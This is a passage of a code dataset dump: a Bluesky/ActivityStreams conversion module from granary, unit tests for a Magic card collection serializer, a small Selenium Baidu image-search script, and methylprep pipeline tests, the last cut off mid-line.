https://atproto.com/specs/did\n\n Args:\n url: str\n\n Returns: str\n \"\"\"\n parsed = urllib.parse.urlparse(url)\n if not parsed.hostname:\n raise ValueError(f'Invalid URL: {url}')\n if parsed.netloc != parsed.hostname:\n logger.warning(f\"URL {url} contained a port, which will not be included in the DID.\")\n if parsed.path and parsed.path != \"/\":\n logger.warning(f\"URL {url} contained a path, which will not be included in the DID.\")\n\n return f'did:web:{parsed.hostname}'\n\n\ndef did_web_to_url(did):\n \"\"\"Converts a did:web to a URL.\n\n In AT Proto, only hostname-based web DIDs are supported.\n Paths are not supported, and will throw an invalid error.\n\n Examples:\n * 'did:web:foo.com' => 'https://foo.com'\n * 'did:web:foo.com%3A3000' => INVALID\n * 'did:web:bar.com:baz:baj' => INVALID\n\n https://atproto.com/specs/did\n\n Args:\n did: str\n\n Returns: str\n \"\"\"\n if not did or not DID_WEB_PATTERN.match(did):\n raise ValueError(f'Invalid did:web: {did}')\n\n host = did.removeprefix('did:web:')\n\n host = urllib.parse.unquote(host)\n return f'https://{host}/'\n\n\ndef at_uri_to_web_url(uri, handle=None):\n \"\"\"Converts an at:// URI to a https://bsky.app URL.\n\n Args:\n uri: str, at:// URI\n handle: str, optional user handle. If not provided, defaults to the DID in uri.\n\n Returns:\n str, https://bsky.app URL\n \"\"\"\n if not uri:\n return None\n\n if not uri.startswith('at://'):\n raise ValueError(f'Expected at:// URI, got {uri}')\n\n parsed = urllib.parse.urlparse(uri)\n did = parsed.netloc\n collection, tid = parsed.path.strip('/').split('/')\n\n type = COLLECTIONS.get(collection)\n if not type:\n return None\n\n return f'{Bluesky.user_url(handle or did)}/{type}/{tid}'\n\n\ndef from_as1(obj, from_url=None):\n \"\"\"Converts an AS1 object to a Bluesky object.\n\n The objectType field is required.\n\n Args:\n obj: dict, AS1 object or activity\n from_url: str, optional URL the original object was fetched from.\n Currently unused. TODO: remove?\n\n Returns: dict, app.bsky.* object\n\n Raises:\n ValueError\n if the objectType or verb fields are missing or unsupported\n \"\"\"\n activity = obj\n verb = activity.get('verb') or 'post'\n inner_obj = as1.get_object(activity)\n if inner_obj and verb == 'post':\n obj = inner_obj\n\n type = obj.get('objectType') or 'note'\n actor = as1.get_object(activity, 'actor')\n\n # TODO: once we're on Python 3.10, switch this to a match statement!\n if type == 'person':\n # banner is featured image, if available\n banner = None\n for img in util.get_list(obj, 'image'):\n url = img.get('url')\n if img.get('objectType') == 'featured' and url:\n banner = url\n break\n\n url = as1.get_url(obj)\n id = obj.get('id')\n if not url and id:\n parsed = util.parse_tag_uri(id)\n if parsed:\n # This is only really formatted as a URL to keep url_to_did_web happy.\n url = f'https://{parsed[0]}'\n try:\n did_web = url_to_did_web(url)\n except ValueError as e:\n logger.info(f\"Couldn't generate did:web: {e}\")\n did_web = ''\n\n # handles must be hostnames\n # https://atproto.com/specs/handle\n username = obj.get('username')\n parsed = urllib.parse.urlparse(url)\n domain = parsed.netloc\n if username and HANDLE_PATTERN.match(username):\n handle = username\n elif url:\n handle = domain\n else:\n handle = ''\n\n ret = {\n '$type': 'app.bsky.actor.defs#profileView',\n 'displayName': obj.get('displayName'),\n 'description': obj.get('summary'),\n 'avatar': util.get_url(obj, 'image'),\n 'banner': banner,\n 'did': id if id and id.startswith('did:') else did_web,\n # this is a DID\n # atproto/packages/pds/src/api/app/bsky/actor/getProfile.ts#38\n # TODO: should be more specific than domain, many users will be on shared\n # domains\n 'handle': handle,\n }\n\n elif verb == 'share':\n ret = from_as1(inner_obj)\n ret['reason'] = {\n '$type': 'app.bsky.feed.defs#reasonRepost',\n 'by': from_as1(actor),\n 'indexedAt': util.now().isoformat(),\n }\n\n elif verb == 'follow':\n if not actor or not inner_obj:\n raise ValueError('follow activity requires actor and object')\n ret = {\n '$type': 'app.bsky.graph.follow',\n 'subject': actor.get('id') or actor.get('url'),\n 'createdAt': obj.get('published', ''),\n }\n\n elif verb == 'post' and type in ('article', 'comment', 'link', 'mention', 'note'):\n # convert text to HTML and truncate\n src = Bluesky('unused')\n content = obj.get('content')\n text = obj.get('summary') or content or obj.get('name') or ''\n text = src.truncate(text, None, OMIT_LINK)\n\n facets = []\n if text == content:\n # convert index-based to facets\n for tag in util.get_list(obj, 'tags'):\n facet = {\n '$type': 'app.bsky.richtext.facet',\n }\n\n url = tag.get('url')\n type = tag.get('objectType')\n if type == 'mention':\n facet['features'] = [{\n '$type': 'app.bsky.richtext.facet#mention',\n 'did': (url.removeprefix(f'{Bluesky.BASE_URL}/profile/')\n if url.startswith(f'{Bluesky.BASE_URL}/profile/did:')\n else ''),\n }]\n elif type in ('article', 'link', 'note') or url:\n facet['features'] = [{\n '$type': 'app.bsky.richtext.facet#link',\n 'uri': url,\n }]\n\n try:\n start = int(tag['startIndex'])\n if start and obj.get('content_is_html'):\n raise NotImplementedError('HTML content is not supported with index tags')\n end = start + int(tag['length'])\n\n facet['index'] = {\n # convert indices from Unicode chars (code points) to UTF-8 encoded bytes\n # https://github.com/snarfed/atproto/blob/5b0c2d7dd533711c17202cd61c0e101ef3a81971/lexicons/app/bsky/richtext/facet.json#L34\n 'byteStart': len(content[:start].encode()),\n 'byteEnd': len(content[:end].encode()),\n }\n except (KeyError, ValueError, IndexError, TypeError):\n pass\n\n facets.append(facet)\n\n # images\n images_embed = images_record_embed = None\n images = util.get_list(obj, 'image')\n\n if images:\n images_embed = {\n '$type': 'app.bsky.embed.images#view',\n 'images': [{\n '$type': 'app.bsky.embed.images#viewImage',\n 'thumb': img.get('url'),\n 'fullsize': img.get('url'),\n 'alt': img.get('displayName') or '',\n } for img in images[:4]],\n }\n images_record_embed = {\n '$type': 'app.bsky.embed.images',\n 'images': [{\n '$type': 'app.bsky.embed.images#image',\n 'image': 'TODO', # this is a $type: blob\n 'alt': img.get('displayName') or '',\n } for img in images[:4]],\n }\n\n # article/note attachments\n record_embed = record_record_embed = external_embed = external_record_embed = None\n\n for att in util.get_list(obj, 'attachments'):\n if not att.get('objectType') in ('article', 'link', 'note'):\n continue\n\n id = att.get('id') or ''\n url = att.get('url') or ''\n if (id.startswith('at://') or id.startswith(Bluesky.BASE_URL) or\n url.startswith('at://') or url.startswith(Bluesky.BASE_URL)):\n # quoted Bluesky post\n embed = from_as1(att).get('post')\n embed['value'] = embed.pop('record', None)\n record_embed = {\n '$type': f'app.bsky.embed.record#view',\n 'record': {\n **embed,\n '$type': f'app.bsky.embed.record#viewRecord',\n # override these so that trim_nulls below will remove them\n 'downvoteCount': None,\n 'replyCount': None,\n 'repostCount': None,\n 'upvoteCount': None,\n },\n }\n record_record_embed = {\n '$type': f'app.bsky.embed.record',\n 'record': {\n 'cid': 'TODO',\n 'uri': id or url,\n }\n }\n else:\n # external link\n external_record_embed = {\n '$type': f'app.bsky.embed.external',\n 'external': {\n '$type': f'app.bsky.embed.external#external',\n 'uri': url or id,\n 'title': att.get('displayName'),\n 'description': att.get('summary') or att.get('content') or '',\n }\n }\n external_embed = {\n '$type': f'app.bsky.embed.external#view',\n 'external': {\n **external_record_embed['external'],\n '$type': f'app.bsky.embed.external#viewExternal',\n 'thumb': util.get_first(att, 'image'),\n },\n }\n\n if record_embed and (images_embed or external_embed):\n embed = {\n '$type': 'app.bsky.embed.recordWithMedia#view',\n 'record': record_embed,\n 'media': images_embed or external_embed,\n }\n record_embed = {\n '$type': 'app.bsky.embed.recordWithMedia',\n 'record': record_record_embed,\n 'media' : images_record_embed or external_record_embed,\n }\n else:\n embed = record_embed or images_embed or external_embed\n record_embed = record_record_embed or images_record_embed or external_record_embed\n\n # in reply to\n reply = None\n in_reply_to = as1.get_object(obj, 'inReplyTo')\n if in_reply_to:\n reply = {\n '$type': 'app.bsky.feed.post#replyRef',\n 'root': {\n '$type': 'com.atproto.repo.strongRef',\n 'uri': '', # TODO?\n 'cid': 'TODO',\n },\n 'parent': {\n '$type': 'com.atproto.repo.strongRef',\n 'uri': in_reply_to.get('id') or in_reply_to.get('url'),\n 'cid': 'TODO',\n },\n }\n\n # author\n author = as1.get_object(obj, 'author')\n if author:\n author = {\n **from_as1(author),\n '$type': 'app.bsky.actor.defs#profileViewBasic',\n }\n\n ret = {\n '$type': 'app.bsky.feed.defs#feedViewPost',\n 'post': {\n '$type': 'app.bsky.feed.defs#postView',\n 'uri': obj.get('id') or obj.get('url') or '',\n 'cid': 'TODO',\n 'record': {\n '$type': 'app.bsky.feed.post',\n 'text': text,\n 'createdAt': obj.get('published', ''),\n 'embed': record_embed,\n 'facets': facets,\n 'reply': reply\n },\n 'author': author,\n 'embed': embed,\n 'replyCount': 0,\n 'repostCount': 0,\n 'upvoteCount': 0,\n 'downvoteCount': 0,\n 'indexedAt': util.now().isoformat(),\n },\n }\n\n else:\n raise ValueError(f'AS1 object has unknown objectType {type} or verb {verb}')\n\n # keep some fields that are required by lexicons\n return util.trim_nulls(ret, ignore=(\n 'alt',\n 'createdAt',\n 'description',\n 'did',\n 'handle',\n 'root',\n 'text',\n 'uri',\n 'viewer',\n ))\n\n\ndef as1_to_profile(actor):\n \"\"\"Converts an AS1 actor to a Bluesky `app.bsky.actor.profile`.\n\n Args:\n actor: dict, AS1 actor\n\n Raises:\n ValueError: if `actor['objectType']` is not in :attr:`as1.ACTOR_TYPES`\n \"\"\"\n type = actor.get('objectType')\n if type not in as1.ACTOR_TYPES:\n raise ValueError(f'Expected actor type, got {type}')\n\n profile = from_as1(actor)\n assert profile['$type'] == 'app.bsky.actor.defs#profileView'\n profile['$type'] = 'app.bsky.actor.profile'\n\n for field in 'did', 'handle', 'indexedAt', 'labels', 'viewer':\n profile.pop(field, None)\n\n return profile\n\n\ndef to_as1(obj, type=None):\n \"\"\"Converts a Bluesky object to an AS1 object.\n\n The $type field is required.\n\n Args:\n profile: dict, app.bsky.* object\n type: str, optional $type to parse with, only used if obj['$type'] is unset\n\n Returns: dict, AS1 object\n\n Raises:\n ValueError if the $type field is missing or unsupported\n \"\"\"\n if not obj:\n return {}\n\n type = obj.get('$type') or type\n if not type:\n raise ValueError('Bluesky object missing $type field')\n\n # TODO: once we're on Python 3.10, switch this to a match statement!\n if type in ('app.bsky.actor.defs#profileView',\n 'app.bsky.actor.defs#profileViewBasic'):\n images = [{'url': obj.get('avatar')}]\n banner = obj.get('banner')\n if banner:\n images.append({'url': obj.get('banner'), 'objectType': 'featured'})\n\n handle = obj.get('handle')\n did = obj.get('did')\n\n ret = {\n 'objectType': 'person',\n 'id': did,\n 'url': (Bluesky.user_url(handle) if handle\n else did_web_to_url(did) if did and did.startswith('did:web:')\n else None),\n 'displayName': obj.get('displayName'),\n 'summary': obj.get('description'),\n 'image': images,\n }\n\n elif type == 'app.bsky.feed.post':\n text = obj.get('text', '')\n\n # convert facets to tags\n tags = []\n for facet in obj.get('facets', []):\n tag = {}\n\n for feat in facet.get('features', []):\n if feat.get('$type') == 'app.bsky.richtext.facet#link':\n tag.update({\n 'objectType': 'article',\n 'url': feat.get('uri'),\n })\n elif feat.get('$type') == 'app.bsky.richtext.facet#mention':\n tag.update({\n 'objectType': 'mention',\n 'url': Bluesky.user_url(feat.get('did')),\n })\n\n index = facet.get('index', {})\n # convert indices from UTF-8 encoded bytes to Unicode chars (code points)\n # https://github.com/snarfed/atproto/blob/5b0c2d7dd533711c17202cd61c0e101ef3a81971/lexicons/app/bsky/richtext/facet.json#L34\n byte_start = index.get('byteStart')\n if byte_start is not None:\n tag['startIndex'] = len(text.encode()[:byte_start].decode())\n byte_end = index.get('byteEnd')\n if byte_end is not None:\n tag['displayName'] = text.encode()[byte_start:byte_end].decode()\n tag['length'] = len(tag['displayName'])\n\n tags.append(tag)\n\n in_reply_to = obj.get('reply', {}).get('parent', {}).get('uri')\n\n ret = {\n 'objectType': 'comment' if in_reply_to else 'note',\n 'content': text,\n 'inReplyTo': [{\n 'id': in_reply_to,\n 'url': at_uri_to_web_url(in_reply_to),\n }],\n 'published': obj.get('createdAt', ''),\n 'tags': tags,\n }\n\n elif type in ('app.bsky.feed.defs#postView', 'app.bsky.embed.record#viewRecord'):\n ret = to_as1(obj.get('record') or obj.get('value'))\n author = obj.get('author') or {}\n uri = obj.get('uri')\n ret.update({\n 'id': uri,\n 'url': (at_uri_to_web_url(uri, handle=author.get('handle'))\n if uri.startswith('at://') else None),\n 'author': to_as1(author, type='app.bsky.actor.defs#profileViewBasic'),\n })\n\n # convert embeds to attachments\n for embed in util.get_list(obj, 'embeds') + util.get_list(obj, 'embed'):\n embed_type = embed.get('$type')\n\n if embed_type == 'app.bsky.embed.images#view':\n ret.setdefault('image', []).extend(to_as1(embed))\n\n elif embed_type in ('app.bsky.embed.external#view',\n 'app.bsky.embed.record#view'):\n ret.setdefault('attachments', []).append(to_as1(embed))\n\n elif embed_type == 'app.bsky.embed.recordWithMedia#view':\n ret.setdefault('attachments', []).append(to_as1(\n embed.get('record', {}).get('record')))\n media = embed.get('media')\n media_type = media.get('$type')\n if media_type == 'app.bsky.embed.external#view':\n ret.setdefault('attachments', []).append(to_as1(media))\n elif media_type == 'app.bsky.embed.images#view':\n ret.setdefault('image', []).extend(to_as1(media))\n else:\n assert False, f'Unknown embed media type: {media_type}'\n\n elif type == 'app.bsky.embed.images#view':\n ret = [{\n 'url': img.get('fullsize'),\n 'displayName': img.get('alt'),\n } for img in obj.get('images', [])]\n\n elif type == 'app.bsky.embed.external#view':\n ret = to_as1(obj.get('external'), type='app.bsky.embed.external#viewExternal')\n\n elif type == 'app.bsky.embed.external#viewExternal':\n ret = {\n 'objectType': 'link',\n 'url': obj.get('uri'),\n 'displayName': obj.get('title'),\n 'summary': obj.get('description'),\n 'image': obj.get('thumb'),\n }\n\n elif type == 'app.bsky.embed.record#view':\n record = obj.get('record')\n return to_as1(record) if record else None\n\n elif type == 'app.bsky.embed.record#viewNotFound':\n return None\n\n elif type in ('app.bsky.embed.record#viewNotFound',\n 'app.bsky.embed.record#viewBlocked'):\n return None\n\n elif type == 'app.bsky.feed.defs#feedViewPost':\n ret = to_as1(obj.get('post'), type='app.bsky.feed.defs#postView')\n reason = obj.get('reason')\n if reason and reason.get('$type') == 'app.bsky.feed.defs#reasonRepost':\n ret = {\n 'objectType': 'activity',\n 'verb': 'share',\n 'object': ret,\n 'actor': to_as1(reason.get('by'), type='app.bsky.actor.defs#profileViewBasic'),\n }\n\n elif type == 'app.bsky.graph.follow':\n ret = {\n 'objectType': 'activity',\n 'verb': 'follow',\n 'actor': {\n 'url': obj.get('subject'),\n },\n }\n\n elif type == 'app.bsky.feed.defs#threadViewPost':\n return to_as1(obj.get('post'), type='app.bsky.feed.defs#postView')\n\n elif type == 'app.bsky.feed.defs#generatorView':\n uri = obj.get('uri')\n ret = {\n 'objectType': 'service',\n 'id': uri,\n 'url': at_uri_to_web_url(uri),\n 'displayName': f'Feed: {obj.get(\"displayName\")}',\n 'summary': obj.get('description'),\n 'image': obj.get('avatar'),\n 'author': to_as1(obj.get('creator'), type='app.bsky.actor.defs#profileView'),\n }\n\n else:\n raise ValueError(f'Bluesky object has unknown $type: {type}')\n\n return util.trim_nulls(ret)\n\n\nclass Bluesky(Source):\n \"\"\"Bluesky source class. See file docstring and Source class for details.\n\n Attributes:\n handle: str\n did: str\n access_token: str\n \"\"\"\n\n DOMAIN = 'bsky.app'\n BASE_URL = 'https://bsky.app'\n NAME = 'Bluesky'\n TRUNCATE_TEXT_LENGTH = 300 # TODO: load from feed.post lexicon\n\n def __init__(self, handle, did=None, access_token=None, app_password=None):\n \"\"\"Constructor.\n\n Either access_token or app_password may be provided, optionally, but not both.\n\n Args:\n handle: str username, eg 'snarfed.bsky.social' or 'snarfed.org'\n did: str, did:plc or did:web, optional\n access_token: str, optional\n app_password: str, optional\n \"\"\"\n assert not (access_token and app_password)\n\n _maybe_load_lexicons()\n\n if app_password:\n client = Client('https://bsky.social', LEXICONS)\n resp = client.com.atproto.server.createSession({\n 'identifier': handle,\n 'password': app_password,\n })\n self.handle = resp['handle']\n self.did = resp['did']\n self.access_token = resp['accessJwt']\n assert self.access_token\n else:\n self.handle = handle\n self.access_token = access_token\n self.did = did\n\n headers = None\n if self.access_token:\n headers = {\n 'Authorization': f'Bearer {self.access_token}',\n }\n self.client = Client('https://bsky.social', LEXICONS, headers=headers)\n\n @classmethod\n def user_url(cls, handle):\n \"\"\"Returns the profile URL for a given handle.\n\n Args:\n handle: str\n\n Returns:\n str, profile URL\n \"\"\"\n return f'{cls.BASE_URL}/profile/{handle.lstrip(\"@\")}'\n\n @classmethod\n def post_url(cls, handle, tid):\n \"\"\"Returns the post URL for a given handle and tid.\n\n Args:\n handle: str\n tid: str\n\n Returns:\n str, profile URL\n \"\"\"\n return f'{cls.user_url(handle)}/post/{tid}'\n\n def get_activities_response(self, user_id=None, group_id=None, app_id=None,\n activity_id=None, fetch_replies=False,\n fetch_likes=False, fetch_shares=False,\n include_shares=True, fetch_events=False,\n fetch_mentions=False, search_query=None,\n start_index=None, count=None, cache=None, **kwargs):\n \"\"\"Fetches posts and converts them to AS1 activities.\n\n See :meth:`Source.get_activities_response` for more information.\n\n Bluesky-specific details:\n\n Args:\n * activity_id: str, an at:// URI\n \"\"\"\n assert not start_index\n\n params = {}\n if count is not None:\n params['limit'] = count\n\n posts = None\n\n if activity_id:\n if not activity_id.startswith('at://'):\n raise ValueError(f'Expected activity_id to be at:// URI; got {activity_id}')\n resp = self.client.app.bsky.feed.getPostThread({}, uri=activity_id, depth=1)\n posts = [resp.get('thread', {})]\n\n elif group_id in (None, FRIENDS):\n resp = self.client.app.bsky.feed.getTimeline({}, **params)\n posts = resp.get('feed', [])\n\n else: # eg group_id SELF\n handle = user_id or self.handle or self.did\n if not handle:\n raise ValueError('user_id is required')\n resp = self.client.app.bsky.feed.getAuthorFeed({}, actor=handle, **params)\n posts = resp.get('feed', [])\n\n # TODO: inReplyTo\n ret = self.make_activities_base_response(\n util.trim_nulls(to_as1(post, type='app.bsky.feed.defs#feedViewPost'))\n for post in posts\n )\n ret['actor'] = {\n 'id': self.did,\n 'displayName': self.handle,\n 'url': self.user_url(self.handle),\n }\n return ret\n","sub_path":"granary/bluesky.py","file_name":"bluesky.py","file_ext":"py","file_size_in_byte":23083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"208465634","text":"\"\"\"Tests for mtg_ssm.serialization.interface.py\"\"\"\n\nimport unittest\n\nfrom mtg_ssm.mtg import collection\nfrom mtg_ssm.mtg import models\nfrom mtg_ssm.serialization import interface\n\nfrom tests.mtgjson import mtgjson_testcase\n\n\nclass StubSerializer(interface.MtgSsmSerializer):\n \"\"\"Stub serializer for testing purposes.\"\"\"\n\n format = None\n extension = None\n write_to_file = None\n read_from_file = None\n\n\nclass SubclassRegistrationTest(unittest.TestCase):\n\n def test_all_formats(self):\n all_formats = interface.MtgSsmSerializer.all_formats()\n expected = ['auto', 'csv', 'xlsx', 'deckbox']\n self.assertCountEqual(expected, all_formats)\n self.assertEqual('auto', expected[0])\n\n def test_auto_csv(self):\n serializer_class = interface.MtgSsmSerializer.by_extension_and_format(\n '.csv', 'auto')\n self.assertIsInstance(serializer_class, type)\n self.assertEqual('MtgCsvSerializer', serializer_class.__name__)\n\n def test_manual_csv(self):\n serializer_class = interface.MtgSsmSerializer.by_extension_and_format(\n None, 'csv')\n self.assertIsInstance(serializer_class, type)\n self.assertEqual('MtgCsvSerializer', serializer_class.__name__)\n\n def test_auto_xlsx(self):\n serializer_class = interface.MtgSsmSerializer.by_extension_and_format(\n '.xlsx', 'auto')\n self.assertIsInstance(serializer_class, type)\n self.assertEqual('MtgXlsxSerializer', serializer_class.__name__)\n\n def test_manual_xlsx(self):\n serializer_class = interface.MtgSsmSerializer.by_extension_and_format(\n None, 'xlsx')\n self.assertIsInstance(serializer_class, type)\n self.assertEqual('MtgXlsxSerializer', serializer_class.__name__)\n\n def test_unknown_auto(self):\n with self.assertRaises(interface.InvalidExtensionOrFormat):\n interface.MtgSsmSerializer.by_extension_and_format('', 'auto')\n\n def test_unknown_format(self):\n with self.assertRaises(interface.InvalidExtensionOrFormat):\n interface.MtgSsmSerializer.by_extension_and_format(None, 'foo')\n\n\nclass LoadCountsTest(mtgjson_testcase.MtgJsonTestCase):\n\n def setUp(self):\n super().setUp()\n self.collection = collection.Collection(self.mtg_data)\n self.print_id = '958ae1416f8f6287115ccd7c5c61f2415a313546'\n self.printing = self.collection.id_to_printing[self.print_id]\n self.serializer = StubSerializer(self.collection)\n\n def test_coerce_counts(self):\n counts = {'id': 'a', 'multiverseid': '12', 'copies': '4', 'foils': '5'}\n coerced_counts = interface.coerce_counts(counts)\n expected = {'id': 'a', 'multiverseid': 12, 'copies': 4, 'foils': 5}\n self.assertEqual(expected, coerced_counts)\n\n def test_printing_not_found(self):\n counts = {}\n with self.assertRaises(interface.DeserializationError):\n self.serializer.load_counts(counts)\n\n def test_load_nothing(self):\n counts = {'id': self.print_id}\n self.serializer.load_counts(counts)\n self.assertFalse(self.printing.counts)\n\n def test_load_zeros(self):\n counts = {'id': self.print_id, 'copies': 0, 'foils': 0}\n self.serializer.load_counts(counts)\n self.assertFalse(self.printing.counts)\n\n def test_load_counts(self):\n counts = {'id': self.print_id, 'copies': 1, 'foils': 2}\n self.serializer.load_counts(counts)\n expected = {\n models.CountTypes.copies: 1,\n models.CountTypes.foils: 2,\n }\n self.assertEqual(expected, self.printing.counts)\n\n def test_load_with_find(self):\n counts = {'set': 'S00', 'name': 'Rhox', 'copies': 1}\n self.serializer.load_counts(counts)\n printing = self.collection.id_to_printing[\n '536d407161fa03eddee7da0e823c2042a8fa0262']\n self.assertEqual({models.CountTypes.copies: 1}, printing.counts)\n\n def test_increase_counts(self):\n self.printing.counts[models.CountTypes.copies] = 1\n self.printing.counts[models.CountTypes.foils] = 2\n counts = {'id': self.print_id, 'copies': 4, 'foils': '8'}\n self.serializer.load_counts(counts)\n expected = {\n models.CountTypes.copies: 5,\n models.CountTypes.foils: 10,\n }\n self.assertEqual(expected, self.printing.counts)\n\n\nclass FindPrintingTest(mtgjson_testcase.MtgJsonTestCase):\n\n def setUp(self):\n super().setUp()\n self.collection = collection.Collection(self.mtg_data)\n\n def test_not_found(self):\n # Execute\n printing = interface.find_printing(\n coll=self.collection, set_code='foo', name='bar', set_number='baz',\n multiverseid='quux')\n # Verify\n self.assertIsNone(printing)\n\n def test_set_and_name(self):\n # Execute\n printing = interface.find_printing(\n coll=self.collection, set_code='S00', name='Rhox', set_number='foo',\n multiverseid='bar')\n # Verify\n self.assertEqual(\n '536d407161fa03eddee7da0e823c2042a8fa0262', printing.id_)\n\n def test_set_and_name_dupes(self):\n # Execute\n printing = interface.find_printing(\n coll=self.collection, set_code='ICE', name='Forest',\n set_number=None, multiverseid=None)\n # Verify\n self.assertIsNone(printing)\n\n def test_set_name_num(self):\n # Execute\n printing = interface.find_printing(\n coll=self.collection, set_code='pMGD', name=\"Black Sun's Zenith\",\n set_number='7', multiverseid='foo')\n # Verify\n self.assertEqual(\n '6c9ffa9ffd2cf7e6f85c6be1713ee0c546b9f8fc', printing.id_)\n\n def test_set_name_mv(self):\n # Execute\n printing = interface.find_printing(\n coll=self.collection, set_code='LEA', name='Forest',\n set_number='foo', multiverseid=288)\n # Verify\n self.assertEqual(\n '5ede9781b0c5d157c28a15c3153a455d7d6180fa', printing.id_)\n\n def test_get_set_name_num_mv(self):\n # Execute\n printing = interface.find_printing(\n coll=self.collection, set_code='ISD', name='Abattoir Ghoul',\n set_number='85', multiverseid=222911)\n # Verify\n self.assertEqual(\n '958ae1416f8f6287115ccd7c5c61f2415a313546', printing.id_)\n\n def test_bad_set_code(self):\n # Execute\n printing = interface.find_printing(\n coll=self.collection, set_code='foo', name='Abattoir Ghoul',\n set_number='85', multiverseid=222911)\n # Verify\n self.assertIsNone(printing)\n\n def test_bad_name(self):\n # Execute\n printing = interface.find_printing(\n coll=self.collection, set_code='ISD', name='foo', set_number='85',\n multiverseid=222911)\n # Verify\n self.assertIsNone(printing)\n","sub_path":"tests/serialization/test_interface.py","file_name":"test_interface.py","file_ext":"py","file_size_in_byte":6920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"323666041","text":"from selenium import webdriver\nimport time\nfrom selenium.webdriver import ActionChains\nfrom selenium.webdriver.common.keys import Keys\n\nurl = \"https://www.baidu.com\"\nname = \"二次元图片\"\nname_class = \"图片\"\ndriver = webdriver.Firefox()\ndriver.maximize_window()\ndriver.get(url)\ntime.sleep(2)\n\ndriver.find_element_by_css_selector(\"div.head_wrapper\").find_element_by_id(\"kw\").send_keys(name)\ndriver.find_element_by_css_selector(\"div.head_wrapper\").find_element_by_id(\"su\").click()\ntime.sleep(1)\ndriver.find_element_by_id(\"wrapper\").find_element_by_link_text(name_class).click()\n\nt = True\ni = 0\nwhile t:\n js = \"window.scrollTo(0, document.body.scrollHeight)\"\n driver.execute_script(js)\n\n c = driver.find_elements_by_class_name('imgitem')\n try:\n driver.find_element_by_id(\"pageMoreWrap\").find_element_by_id(\"resultInfo\").click()\n t = False\n except:\n i +=1\n print(i)\nprint(\"数量: \", len(c))\nfor i in c:\n et = i.get_attribute('data-thumburl')\n print(et)\n\n# page = driver.page_source # 页面源\n# print(page.replace(u'\\xbb', u' '))","sub_path":"python/jupyter/jupyter/爬虫查看/爬虫代码练习5.py","file_name":"爬虫代码练习5.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"42168888","text":"import sys\nimport numpy as np\nimport pandas as pd\nfrom pathlib import Path\n# App\nfrom methylprep.processing import pipeline\nfrom methylprep.utils.files import download_file\n#patching\ntry:\n # python 3.4+ should use builtin unittest.mock not mock package\n from unittest.mock import patch\nexcept ImportError:\n from mock import patch\n\n\nclass TestPipeline():\n\n @staticmethod\n def test_run_pipeline_all():\n \"\"\" check that we get back useful data.\n check that output files exist, then remove them.\"\"\"\n test_data_dir = 'docs/example_data/GSE69852'\n test_outputs = [\n Path(test_data_dir, 'control_probes.pkl'),\n Path(test_data_dir, 'beta_values.pkl'),\n Path(test_data_dir, 'm_values.pkl'),\n Path(test_data_dir, 'meth_values.pkl'),\n Path(test_data_dir, 'unmeth_values.pkl'),\n Path(test_data_dir, 'noob_meth_values.pkl'),\n Path(test_data_dir, 'noob_unmeth_values.pkl'),\n Path(test_data_dir, 'sample_sheet_meta_data.pkl'),\n Path(test_data_dir, '9247377085', '9247377085_R04C02_processed.csv'),\n Path(test_data_dir, '9247377093', '9247377093_R02C01_processed.csv'),\n ]\n for outfile in test_outputs:\n if outfile.exists():\n outfile.unlink()\n\n beta_df = pipeline.run_pipeline(test_data_dir, export=True, save_uncorrected=True, save_control=True, betas=True, m_value=True, batch_size=None)\n for outfile in test_outputs:\n if not outfile.exists():\n raise FileNotFoundError(f\"Expected {outfile.name} to be generated by run_pipeline() but it was missing.\")\n else:\n print('+', outfile)\n outfile.unlink()\n\n @staticmethod\n def test_run_pipeline_demo_containers():\n \"\"\" check that we get back useful data.\n check that output files exist, then remove them.\"\"\"\n test_data_dir = 'docs/example_data/GSE69852'\n test_data_containers = pipeline.run_pipeline(test_data_dir)\n print('containers:', test_data_containers)\n\n # spot checking the output.\n #if not test_data_containers[1].unmethylated.data_frame.iloc[0]['mean_value'] == 2712:\n if not np.isclose(test_data_containers[1]._SampleDataContainer__data_frame.iloc[0]['m_value'], -1.1347262):\n raise AssertionError()\n #if not np.isclose(test_data_containers[1].unmethylated.data_frame.iloc[0]['noob'], 4479.96501260212):\n if not np.isclose(test_data_containers[1]._SampleDataContainer__data_frame.iloc[0]['noob_unmeth'], 4480.919922):\n raise AssertionError()\n\n @staticmethod\n def test_run_pipeline_with_create_sample_sheet():\n test_data_dir = 'docs/example_data/epic_plus'\n test_data_containers = pipeline.run_pipeline(test_data_dir, export=False, sample_name=['Sample_1'],\n meta_data_frame=False, make_sample_sheet=True)\n # spot checking the output.\n if not np.isclose(test_data_containers[0]._SampleDataContainer__data_frame.iloc[0]['noob_meth'], 1180.22998046875):\n print(test_data_containers[0]._SampleDataContainer__data_frame)\n raise AssertionError(f\"{test_data_containers[0]._SampleDataContainer__data_frame.iloc[0]['noob_meth']} vs {1180.2299}\")\n if not np.isclose(test_data_containers[0]._SampleDataContainer__data_frame.iloc[0]['beta_value'], 0.759056):\n raise AssertionError()\n\n @staticmethod\n def test_download_manifest_dummy_file():\n \"\"\" will download a tiny file from the array-manifest-files s3 bucket, to test the SSL connection on all platforms.\n The dummy file is not a proper manifest CSV, so doesn't test format.\n download_file now defaults to non-SSL if SSL fails, with warning to user.\"\"\"\n test_filename = 'unittest.txt'\n test_s3_bucket = 'https://array-manifest-files.s3.amazonaws.com' # 's3://array-manifest-files'\n dest_dir = 'tests'\n # use the .download_file() method in files.py to test the download step specifically. this is called by Manifests() class.\n download_file(test_filename, test_s3_bucket, dest_dir, overwrite=False)\n # in testing mode, this should not exist, and should get deleted right after each successful test.\n if not Path(dest_dir,test_filename).is_file():\n raise AssertionError()\n Path(dest_dir,test_filename).unlink() # deletes file.\n\n @staticmethod\n def test_pipeline_two_samples():\n \"\"\" pass in --sample_name with 2 samples -- from fake command line args \"\"\"\n test_data_dir = 'docs/example_data/GSE69852'\n testargs = [\"__program__\", '-d', test_data_dir, '--no_export', '--sample_name', 'AdultLiver1', 'FetalLiver1']\n with patch.object(sys, 'argv', testargs):\n test_data_containers = pipeline.run_pipeline(test_data_dir)\n # spot checking the output.\n #if not test_data_containers[1].unmethylated.data_frame.iloc[0]['mean_value'] == 2712:\n #if not test_data_containers[1]._SampleDataContainer__data_frame.iloc[0]['unmeth'] == 2712:\n # raise AssertionError()\n if not 